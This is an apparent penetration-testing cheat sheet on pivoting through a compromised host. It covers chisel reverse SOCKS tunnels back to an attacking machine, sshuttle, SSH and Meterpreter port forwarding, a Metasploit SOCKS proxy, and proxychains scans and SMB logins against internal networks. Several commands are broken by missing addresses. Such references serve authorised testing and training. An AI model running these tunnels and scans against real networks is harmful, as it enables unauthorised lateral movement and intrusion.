Pivoting and Portforwarding



# Clone Repository
git clone ''
# Build Binary
go build
# Binary is now built and ready to be transfered over to target system.

Reverse SOCKS proxy

# Attacking Machine
./chisel server -p <Port> --reverse &
./chisel server -p 1337 --reverse &
# On Target Machine
./chisel client <Attacking-IP>:<Port> R:socks &
./chisel client R:socks &
# Then use Proxychains to scan internal networks from the compromised host.


# Authenticate with password
sshuttle -r <User>@<Target-IP> <Target-Subnet> -x <Target-IP>
sshuttle -r [email protected] -x
# Authenticate with key.
sshuttle -r <User>@<IP> --ssh-cmd "<Command>" <Target Subnet> -x <Exclude IP>
sshuttle -r [email protected] --ssh-cmd "ssh -i id_rsa" -x


# Forward RDP from internal host to Attacking Machine on port 1337.
ssh -L <LocalHost>:<Port>:<IP-To-Forward-From>:<Port> <User>@<IP>
ssh -L [email protected] -i id_rsa
# Forward remote port 80 to local port 80.
ssh [email protected] -L 80:
ssh <User>@<IP> -L <Local-Port><Remote-Port>
# Dynamic SSH Port Forwarding
ssh -i <id_rsa> <User>@<IP> -D <Proxychains-Port>
ssh -i id_rsa [email protected] -D 1080

Metasploit with Proxychains

Change last line in /etc/proxychains4.conf to the following value: socks5 1080
Then use the following Metasploit module:
use auxiliary/server/socks_proxy
Set module options to the following (Default):
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
SRVHOST yes The address to listen on
SRVPORT 1080 yes The port to listen on
USERNAME no Proxy username for SOCKS5 listener
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)
We can then force applications to use proxychains by initiating commands with the command proxychains first.
proxychains nmap <IP> -sT -p 1-10000 -sV -v
proxychains crackmapexec smb -u '' -p ''
proxychains ssh <user>@<IP>
proxychains telnet <IP>

Double Pivot

# /etc/proxychains.conf
# Ensure dynamic_chain is uncommented
tcp_read_time_out 15000
tcp_connect_time_out 8000
socks5 1080 # First Pivot
socks5 1081 # Second Pivot

Port Forward

Meterpreter can be used to portforward for access to file shares and web servers.
portfwd add -l <LocalPort> -p <RemotePort> -r <TargetIP>
portfwd add -l 3333 -p 3389 -r
Essentially as per the example command above we could connect to RDP on our local port in order to hit the remote port.


Whilst not a direct pivoting technique, using xFreeRDP to share the hosts file system can give the attacker an easy route for moving files across systems to further assist with pivoting
xfreerdp /v:IP /u:USERNAME /p:PASSWORD +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share